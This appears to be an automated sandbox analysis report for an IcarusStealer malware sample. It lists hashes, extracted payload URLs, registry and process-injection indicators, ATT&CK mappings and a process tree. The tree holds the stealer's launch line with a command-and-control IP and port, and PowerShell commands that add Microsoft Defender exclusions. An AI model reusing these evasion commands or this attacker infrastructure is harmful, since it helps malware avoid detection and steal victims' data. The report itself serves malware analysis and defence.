icarusstealer | 5422c44ddaea8b411bd457cd24c33c1c1fa8eed02dbdb35338da412f2be1dd33

General

Target

02d13710a5a788759319df4d64b95c17.exe
Size

494KB
MD5

02d13710a5a788759319df4d64b95c17
SHA1

166121845fb2f40cc9febc35dea432696e388bec
SHA256

5422c44ddaea8b411bd457cd24c33c1c1fa8eed02dbdb35338da412f2be1dd33
SHA512

0a0a9c7ef30d0d3e71141684e796cfc78eb9d4689e37ae6d66123dfdd8a12df55dd424c47cd1d75068c6b8ff16512da2d607b69a6bc6cbcfba01b8063311171c
SSDEEP

12288:zhGwluLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+QY:VBZ6N6LqQzJqk/

Score

10^/10

icarusstealer persistence stealer

Malware Config

Extracted

Family

icarusstealer

Attributes

payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg

Signatures

IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
stealer icarusstealer

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

02d13710a5a788759319df4d64b95c17.exe

description pid process target process

PID 2252 set thread context of 2504 2252 02d13710a5a788759319df4d64b95c17.exe cvtres.exe

description	pid	process	target process
PID 2252 set thread context of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	cvtres.exe

Modifies registry class 5 IoCs

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000_Classes\Local Settings	explorer.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2924 powershell.exe
2060 powershell.exe

pid	process
2924	powershell.exe
2060	powershell.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

explorer.execvtres.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeDebugPrivilege	2504	cvtres.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe
Token: SeShutdownPrivilege	1744	explorer.exe

Suspicious use of FindShellTrayWindow 27 IoCs

Processes:

explorer.exe

pid	process
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe

Suspicious use of SendNotifyMessage 17 IoCs

Processes:

explorer.exe

pid	process
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe
1744	explorer.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

02d13710a5a788759319df4d64b95c17.exeexplorer.execvtres.execmd.execmd.exe

description	pid	process	target process
PID 2252 wrote to memory of 1744	2252	02d13710a5a788759319df4d64b95c17.exe	explorer.exe
PID 2252 wrote to memory of 1744	2252	02d13710a5a788759319df4d64b95c17.exe	explorer.exe
PID 2252 wrote to memory of 1744	2252	02d13710a5a788759319df4d64b95c17.exe	explorer.exe
PID 2252 wrote to memory of 1744	2252	02d13710a5a788759319df4d64b95c17.exe	explorer.exe
PID 1744 wrote to memory of 2980	1744	explorer.exe	ctfmon.exe
PID 1744 wrote to memory of 2980	1744	explorer.exe	ctfmon.exe
PID 1744 wrote to memory of 2980	1744	explorer.exe	ctfmon.exe
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	cvtres.exe
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	cvtres.exe
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	cvtres.exe
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	cvtres.exe
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	cvtres.exe
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	cvtres.exe
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	cvtres.exe
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	cvtres.exe
PID 2252 wrote to memory of 2504	2252	02d13710a5a788759319df4d64b95c17.exe	cvtres.exe
PID 2504 wrote to memory of 2492	2504	cvtres.exe	cmd.exe
PID 2504 wrote to memory of 2492	2504	cvtres.exe	cmd.exe
PID 2504 wrote to memory of 2492	2504	cvtres.exe	cmd.exe
PID 2504 wrote to memory of 2492	2504	cvtres.exe	cmd.exe
PID 2504 wrote to memory of 2956	2504	cvtres.exe	cmd.exe
PID 2504 wrote to memory of 2956	2504	cvtres.exe	cmd.exe
PID 2504 wrote to memory of 2956	2504	cvtres.exe	cmd.exe
PID 2504 wrote to memory of 2956	2504	cvtres.exe	cmd.exe
PID 2492 wrote to memory of 2060	2492	cmd.exe	powershell.exe
PID 2492 wrote to memory of 2060	2492	cmd.exe	powershell.exe
PID 2492 wrote to memory of 2060	2492	cmd.exe	powershell.exe
PID 2492 wrote to memory of 2060	2492	cmd.exe	powershell.exe
PID 2956 wrote to memory of 2924	2956	cmd.exe	powershell.exe
PID 2956 wrote to memory of 2924	2956	cmd.exe	powershell.exe
PID 2956 wrote to memory of 2924	2956	cmd.exe	powershell.exe
PID 2956 wrote to memory of 2924	2956	cmd.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\02d13710a5a788759319df4d64b95c17.exe
"C:\Users\Admin\AppData\Local\Temp\02d13710a5a788759319df4d64b95c17.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2252

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
2⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1744

C:\Windows\system32\ctfmon.exe
ctfmon.exe
3⤵
PID:2980

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 147.185.221.17 22817 vUiuCXqqM
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2504

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2492

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
1400b8c22aede020e85aa9888a10fc61

SHA1
203eb8eb6d28c15a79b0f6144ba776462239c138

SHA256
70107ae78bf57a5490a6ea39e27166e5c8e05d0ea8d81fd913316d966c7bcca1

SHA512
84782f6da2d2f1dd5d98c90b04fae37511d29944e741fa2c7b53069f97c78482ae7f59dbb2a17456f320393f5e01e1a243cafab7e5d8a943cd5870f0ea806d7d

Download Submit
memory/1744-42-0x0000000002650000-0x0000000002660000-memory.dmp

Filesize
64KB

Download
memory/1744-38-0x0000000003F60000-0x0000000003F61000-memory.dmp

Filesize
4KB

Download
memory/1744-33-0x0000000003F60000-0x0000000003F61000-memory.dmp

Filesize
4KB

Download
memory/2060-31-0x0000000001F90000-0x0000000001FD0000-memory.dmp

Filesize
256KB

Download
memory/2060-25-0x000000006F3A0000-0x000000006F94B000-memory.dmp

Filesize
5.7MB

Download
memory/2060-35-0x000000006F3A0000-0x000000006F94B000-memory.dmp

Filesize
5.7MB

Download
memory/2060-29-0x000000006F3A0000-0x000000006F94B000-memory.dmp

Filesize
5.7MB

Download
memory/2060-30-0x0000000001F90000-0x0000000001FD0000-memory.dmp

Filesize
256KB

Download
memory/2060-27-0x0000000001F90000-0x0000000001FD0000-memory.dmp

Filesize
256KB

Download
memory/2252-1-0x00000000748F0000-0x0000000074FDE000-memory.dmp

Filesize
6.9MB

Download
memory/2252-2-0x0000000004C20000-0x0000000004C60000-memory.dmp

Filesize
256KB

Download
memory/2252-12-0x00000000748F0000-0x0000000074FDE000-memory.dmp

Filesize
6.9MB

Download
memory/2252-0-0x0000000000C80000-0x0000000000D02000-memory.dmp

Filesize
520KB

Download
memory/2504-3-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2504-13-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2504-17-0x0000000004BE0000-0x0000000004C20000-memory.dmp

Filesize
256KB

Download
memory/2504-10-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2504-16-0x0000000074200000-0x00000000748EE000-memory.dmp

Filesize
6.9MB

Download
memory/2504-15-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2504-9-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/2504-4-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2504-37-0x0000000004BE0000-0x0000000004C20000-memory.dmp

Filesize
256KB

Download
memory/2504-5-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2504-7-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2504-36-0x0000000074200000-0x00000000748EE000-memory.dmp

Filesize
6.9MB

Download
memory/2924-34-0x000000006F3A0000-0x000000006F94B000-memory.dmp

Filesize
5.7MB

Download
memory/2924-32-0x0000000000820000-0x0000000000860000-memory.dmp

Filesize
256KB

Download
memory/2924-28-0x000000006F3A0000-0x000000006F94B000-memory.dmp

Filesize
5.7MB

Download
memory/2924-26-0x000000006F3A0000-0x000000006F94B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads